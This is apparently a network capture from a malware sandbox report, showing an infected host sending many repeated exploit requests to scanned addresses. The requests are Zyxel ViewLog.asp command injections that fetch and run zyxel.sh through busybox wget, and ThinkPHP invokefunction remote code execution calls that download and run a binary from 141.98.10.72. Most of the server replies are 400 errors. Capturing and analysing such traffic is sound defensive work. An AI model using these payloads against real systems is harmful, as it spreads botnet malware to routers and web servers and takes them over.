                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:28.398699045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:33.517893076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:43.500832081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:04.489686966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1075192.168.2.233388431.200.64.2318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.850260973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1076192.168.2.234615494.122.83.938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.850388050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1077192.168.2.235704431.200.111.1588080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.850693941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1078192.168.2.233934894.120.57.1598080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.850830078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1079192.168.2.235521031.200.54.318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.851655960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1080192.168.2.235575685.31.235.2098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:23.945321083 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1081192.168.2.234092631.136.3.2378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:24.071794033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.751080036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:26.094907999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:28.910567045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:34.285957098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:45.036520004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:06.537504911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1082192.168.2.233782694.121.108.2128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:24.098066092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1083192.168.2.233633894.121.22.2278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:24.099260092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1084192.168.2.236075295.101.225.8980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.502907991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:25.698084116 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:30:25 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:25 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 35 26 23 34 36 3b 33 35 31 63 37 61 61 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;37c8645f&#46;1707899425&#46;351c7aa0</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1085192.168.2.235857295.182.152.6880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.517304897 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:25.733491898 CET292INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1086192.168.2.235662695.217.12.17780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.522676945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:25.742826939 CET48INHTTP/1.1 101 Switching Protocols


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1087192.168.2.234565695.140.139.14380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.525595903 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1088192.168.2.234139295.181.177.14180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.533404112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:25.767982960 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:30:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1089192.168.2.234119695.86.86.2780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.558949947 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1090192.168.2.233726295.86.64.15680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.559168100 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1091192.168.2.234253688.149.250.16880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:25.748569965 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:25.975366116 CET1283INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:31:31 GMT
                                                            Server: Trantor
                                                            X-Content-Type-Options: nosniff
                                                            Last-Modified: Thu, 12 Jan 2023 08:55:30 GMT
                                                            ETag: "3ef-5f20d476a55f1"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1007
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 61 6d 50 6f 72 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 31 35 30 70 78 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 09 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 30 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 3b 22 3e 0a 09 09 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 